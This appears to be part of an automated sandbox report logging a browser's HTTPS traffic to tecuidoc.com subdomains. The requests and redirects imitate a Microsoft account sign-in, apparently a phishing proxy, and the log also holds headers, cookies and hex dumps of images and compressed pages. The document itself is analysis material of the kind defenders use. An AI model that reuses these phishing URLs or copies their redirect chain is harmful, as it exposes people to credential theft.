                                              32192.168.2.649752198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:04 UTC1531OUTGET /oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2fsrmcorp.tecuidoc.com%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAS-2C5ti-584NIeJumk-uG95ixGzviczDKwylWMyoSN07_AyPiCkfEWk6B_UbpnSnixW2pKalFiSWZ-3gUWgVcsPAbMVhwcXAIMEgwKDD9YGBexAm3VWO3s1Lcnw31_0fR5LYUijKdY9bMyUtxSLVJcS1Mz3V1TAnP1i1MrUqPcIgPTi6tSMyIqDSL0XXzdQzySfIptDa0MJ7AJTWBjOsXG8IGNsYOdYRY7wwFOxg08jAd4GX7wtW_9OXXigZnvPF7x6wSUhie6VVRFuYdblhXkm-Z5umtHOZunBQWVuZhUpOlHhUQ5O3qmOGa7p-XbbhBgAAA1&estsfed=1&uaid=86a53df4895b44e08756194225f0ef29&signup=1&lw=1&fl=easi2&fci=https%3a%2f%2f0a413710-7d4f53f3.tecuidoc.com.orgid.com HTTP/1.1
                                              Host: l1ve.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:07 UTC970INHTTP/1.1 302 Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:07 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: no-store, no-cache
                                              pragma: no-cache
                                              location: https://signup.tecuidoc.com/signup?sru=https://l1ve.tecuidoc.com/oauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https://2a9e5726-7d4f53f3.tecuidoc.com
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              referrer-policy: strict-origin-when-cross-origin
                                              x-ms-route-info: C519_BL2
                                              x-ms-request-id: 328240b9-4791-49e6-af89-61baf0509125
                                              ppserver: PPV: 30 H: BL02EPF0001D7E3 V: 0
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.649754198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:04 UTC549OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:07 UTC761INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:07 GMT
                                              Content-Type: image/gif
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:48 GMT
                                              etag: 0x8DB5C3F4904824B
                                              x-ms-request-id: 7ef1a81d-601e-0060-4dcc-96a7bc000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145706Z-178cffcc9b5qcrv866ecp68aqn00000002bg000000003tkc
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              2024-04-26 14:57:07 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                              Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                              2024-04-26 14:57:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.649755198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:04 UTC555OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:07 UTC761INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:07 GMT
                                              Content-Type: image/gif
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:47 GMT
                                              etag: 0x8DB5C3F48EC4154
                                              x-ms-request-id: c7e0a10f-701e-0069-57d5-91d4af000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145706Z-17b579f75f7hhhzndq10zd16ew0000000bng000000005t6q
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              2024-04-26 14:57:07 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                              Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                              2024-04-26 14:57:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.649756198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:08 UTC1196OUTGET /signup?sru=https://l1ve.tecuidoc.com/oauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https://2a9e5726-7d4f53f3.tecuidoc.com HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:11 UTC1499INHTTP/1.1 302 Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:11 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: no-cache, no-store
                                              pragma: no-cache
                                              location: https://l1ve.tecuidoc.com/login.srf?wa=wsignin1.0&rpsnv=150&checkda=1&ct=1714143430&rver=7.5.2156.0&wp=MBI_SSL&wreply=https%3A%2F%2Fsignup.tecuidoc.com%2Fsignup%3Fsru%3Dhttps%253a%252f%252fl1ve.tecuidoc.com%252foauth20_authorize.srf%253flc%253d1033%2526client_id%253d51483342-085c-4d86-bf88-cf50c7252078%2526mkt%253dEN-US%2526opid%253dB6E95959DB8DBA86%2526opidt%253d1714143427%2526uaid%253d86a53df4895b44e08756194225f0ef29%2526contextid%253d5ABD0222F1D086D5%2526opignore%253d1%26mkt%3DEN-US%26uiflavor%3Dweb%26lw%3D1%26fl%3Deasi2%26client_id%3D51483342-085c-4d86-bf88-cf50c7252078%26uaid%3D86a53df4895b44e08756194225f0ef29%26suc%3Dhttps%253a%252f%252f0a413710-7d4f53f3.tecuidoc.com.orgid.com%26lic%3D1&lc=1033&id=68692&mkt=en-US&uaid=86a53df4895b44e08756194225f0ef29
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              x-ms-amserver: wcuXXXX00ST (2.0.3311.1)
                                              x-ms-amserver-tm: 15ms
                                              x-ms-request-id: a6453c4c-6aaa-40c6-b51a-ae5e9728d5f6
                                              referrer-policy: strict-origin-when-cross-origin
                                              amserver: wcuXXXXig0000ST
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: A6453C4C6AAA40C6B51AAE5E9728D5F6 Ref B: DFW311000107035 Ref C: 2024-04-26T14:57:10Z
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:11 UTC930INData Raw: 33 39 62 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 31 76 65 2e 74 65 63 75 69 64 6f 63 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 73 72 66 3f 77 61 3d 77 73 69 67 6e 69 6e 31 2e 30 26 61 6d 70 3b 72 70 73 6e 76 3d 31 35 30 26 61 6d 70 3b 63 68 65 63 6b 64 61 3d 31 26 61 6d 70 3b 63 74 3d 31 37 31 34 31 34 33 34 33 30 26 61 6d 70 3b 72 76 65 72 3d 37 2e 35 2e 32 31 35 36 2e 30 26 61 6d 70 3b 77 70 3d 4d 42 49 5f 53 53 4c 26 61 6d 70 3b 77 72 65 70 6c 79 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 69 67 6e 75 70 2e 74 65 63 75
                                              Data Ascii: 39b<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://l1ve.tecuidoc.com/login.srf?wa=wsignin1.0&amp;rpsnv=150&amp;checkda=1&amp;ct=1714143430&amp;rver=7.5.2156.0&amp;wp=MBI_SSL&amp;wreply=https%3A%2F%2Fsignup.tecu
                                              2024-04-26 14:57:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.649757198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:08 UTC707OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                              Sec-WebSocket-Key: s3r5w7f19HO0reHSwJLptQ==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:57:11 UTC740INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:11 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: b592d541-e005-4274-b051-009b91ccf800
                                              x-ms-ests-server: 2.1.17846.6 - NEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.649753198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:11 UTC1499OUTGET /login.srf?wa=wsignin1.0&rpsnv=150&checkda=1&ct=1714143430&rver=7.5.2156.0&wp=MBI_SSL&wreply=https%3A%2F%2Fsignup.tecuidoc.com%2Fsignup%3Fsru%3Dhttps%253a%252f%252fl1ve.tecuidoc.com%252foauth20_authorize.srf%253flc%253d1033%2526client_id%253d51483342-085c-4d86-bf88-cf50c7252078%2526mkt%253dEN-US%2526opid%253dB6E95959DB8DBA86%2526opidt%253d1714143427%2526uaid%253d86a53df4895b44e08756194225f0ef29%2526contextid%253d5ABD0222F1D086D5%2526opignore%253d1%26mkt%3DEN-US%26uiflavor%3Dweb%26lw%3D1%26fl%3Deasi2%26client_id%3D51483342-085c-4d86-bf88-cf50c7252078%26uaid%3D86a53df4895b44e08756194225f0ef29%26suc%3Dhttps%253a%252f%252f0a413710-7d4f53f3.tecuidoc.com.orgid.com%26lic%3D1&lc=1033&id=68692&mkt=en-US&uaid=86a53df4895b44e08756194225f0ef29 HTTP/1.1
                                              Host: l1ve.tecuidoc.com
                                              Connection: keep-alive
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:14 UTC990INHTTP/1.1 302 Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:14 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: no-store, no-cache
                                              pragma: no-cache
                                              location: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              referrer-policy: strict-origin-when-cross-origin
                                              x-ms-route-info: C529_BL2
                                              x-ms-request-id: 1b8b8c9b-5779-456c-97c3-efed400a9cf9
                                              ppserver: PPV: 30 H: BL02EPF0001D877 V: 0
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.649760198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:14 UTC1216OUTGET /signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1 HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:19 UTC797INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:18 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 46290
                                              Connection: close
                                              cache-control: no-cache, no-store
                                              pragma: no-cache
                                              vary: Accept-Encoding
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              x-ua-compatible: IE=edge, chrome=1
                                              x-ms-amserver: eusXXXX00N3 (2.0.3311.1)
                                              x-ms-amserver-tm: 515ms
                                              x-ms-request-id: de4566bb-bcfb-4392-bead-0c2a38ef9723
                                              referrer-policy: strict-origin-when-cross-origin
                                              amserver: eusXXXXgn0000N3
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: DE4566BBBCFB4392BEAD0C2A38EF9723 Ref B: DFW311000106021 Ref C: 2024-04-26T14:57:16Z
                                              content-encoding: gzip
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:19 UTC15587INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 5b db 48 d2 30 fc f9 e5 ba f6 3f 08 6d 86 b1 17 d9 d8 9c b1 23 7c 83 81 84 19 02 24 40 0e 43 58 1e 59 6a db 02 59 72 74 c0 30 e0 ff fe 56 55 77 4b 2d 59 24 64 76 f7 b9 9f 0f 9b dd c1 52 ab cf 87 3a 57 f5 df e6 fe 06 ff 7b 3d bf 77 d2 3d ff 72 ba af 0d e3 91 b7 0d 09 f8 ab 79 96 3f 30 75 e6 eb da fd c8 6b 65 6f b6 67 45 91 a9 8f ae 13 4f d7 1c 37 34 75 2f 0e 75 2d 8a 1f 3c 66 ea 3a 94 d7 b4 d7 43 66 39 f4 04 cf 9e eb df 6a 21 f3 4c 7d 1c 32 3b f0 7d 66 c7 ba 36 0c 59 df d4 87 71 3c 8e 5a 4b 4b 3d 67 dd 6a 34 96 9d da 86 b3 da 5f 5b e9 af d4 63 66 27 ae 13 d8 75 3b 18 41 a3 61 10 45 41 e8 0e 5c 1f 3b f8 1f a8 72 c4 62 4b c3 b2 35 f6 2d 71 ef 4c fd be e6 f8 51 0d ea ef b3 d8 1e d6 a0 95 38 0c 60 c8 f8 c0 fc d8 d4 03 5f
                                              Data Ascii: k[H0?m#|$@CXYjYrt0VUwK-Y$dvR:W{=w=ry?0ukeogEO74u/u-<f:Cf9j!L}2;}f6Yq<ZKK=gj4_[cf'u;AaEA\;rbK5-qLQ8`_
                                              2024-04-26 14:57:19 UTC16379INData Raw: 8c a0 fd e0 19 e0 4b af d2 54 82 af a8 bb c2 e1 99 ee 67 33 15 3c 60 52 83 71 3c 9b 3c 7c 1f ec 15 7c 33 31 8a 20 06 20 81 1a 96 cb 6b 20 d7 8d 08 ba 82 fb 1d 3d 3d ab 3f e5 80 9d 63 84 7f e4 82 3d e3 cc 41 f3 3f e3 81 5d 72 41 6e 6c 0c aa 2d 9e 5b f5 c0 9e b9 f3 16 28 7d c8 59 bc 42 84 6e 0a 01 f4 3c ac 8f 59 48 d1 ca 7c 9b 3b 2d f7 38 a6 84 ad 45 af e7 9c b6 dc e7 3f 13 b3 81 37 87 18 67 38 9d f7 34 a7 a8 c7 d9 c3 fa d4 71 17 df 39 b8 ac 0c cb 2d 32 b2 0f 25 49 8a 7d 45 96 78 e7 46 6e cf f5 dc f8 41 dc 94 4b 1f cb 2a ce d7 59 ac ae b4 a6 3d 80 7d fb 1c 9b 96 d0 b8 13 a0 b8 e7 a6 94 09 c0 ce 47 37 b6 bc 88 44 3e 00 1a 9e 2f f5 0a 4a 61 a1 9c 88 c2 8c 21 05 16 d6 0c 0c 6e 01 65 26 f0 30 94 e4 b2 c5 bf e6 96 dd 1c f3 c4 d3 90 9d 41 01 79 13 8b c3 53 39 c4
                                              Data Ascii: KTg3<`Rq<<||31 k ==?c=A?]rAnl-[(}YBn<YH|;-8E?7g84q9-2%I}ExFnAK*Y=}G7D>/Ja!ne&0AyS9
                                              2024-04-26 14:57:19 UTC14324INData Raw: d9 ee 06 cc e5 4e c0 6c b0 3d ff 73 83 7c 9b f6 b4 35 7a fe 5e 2c af 57 fd c8 7c a7 e7 74 b9 eb ca 42 dd aa 9a 6b 2e fa d5 2b a5 c2 b9 ea 58 a9 e2 9b 32 9a d5 a1 7a fa 92 e9 14 d7 b3 66 10 88 9a e5 78 d4 89 da 18 de d3 a6 21 4d d4 8b b0 b2 3c 4d c9 c1 18 64 aa 3e 08 de a3 2b 52 1b bd de 22 a0 4f c0 00 df 53 09 a9 c2 10 76 6f 76 65 e4 55 02 66 bf ab 42 32 3e fc 2a a3 34 cc 1b b6 d4 13 66 d3 4b f9 bd cf 6c 1c 2d 0d b5 5a fe 44 4f 85 97 bf 8b b0 d9 ef f4 d3 5d fd 41 ca 0b 75 0a e7 ac 71 54 ab 9e c2 59 7b 8e ca 20 67 ba be 3b a3 92 af 7b 52 c7 58 46 ff 54 2c 22 cc 5f 33 90 60 53 c8 4d b3 bd 8c b1 96 26 5a a8 f8 09 3c 9a 7f 3b 88 df a1 d2 92 21 11 53 05 a7 b2 f7 e1 63 9a 61 9c a5 88 4b 09 87 53 3f af c0 f8 4b 28 54 ca dc 4f 28 7c 10 01 6b 5e 17 c7 7f 09 6a 99
                                              Data Ascii: Nl=s|5z^,W|tBk.+X2zfx!M<Md>+R"OSvoveUfB2>*4fKl-ZDO]AuqTY{ g;{RXFT,"_3`SM&Z<;!ScaKS?K(TO(|k^j


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
